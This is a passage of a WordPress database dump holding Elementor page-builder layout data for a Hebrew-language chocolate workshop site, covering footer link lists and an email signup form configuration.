gba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false}]'),(1050,212,'_elementor_version','0.4'),(1051,215,'_elementor_template_type','section'),(1052,215,'_elementor_edit_mode','builder'),(1053,216,'_elementor_template_type','page'),(1054,216,'_elementor_edit_mode','builder'),(1055,215,'_wp_page_template','default'),(1056,215,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1057,217,'_elementor_template_type','page'),(1058,217,'_elementor_edit_mode','builder'),(1059,217,'_wp_page_template','default'),(1060,217,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1061,215,'_elementor_version','0.4'),(1062,218,'_elementor_template_type','section'),(1063,218,'_elementor_edit_mode','builder'),(1064,219,'_elementor_template_type','page'),(1065,219,'_elementor_edit_mode','builder'),(1066,218,'_wp_page_template','default'),(1067,218,'_elementor_data','[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 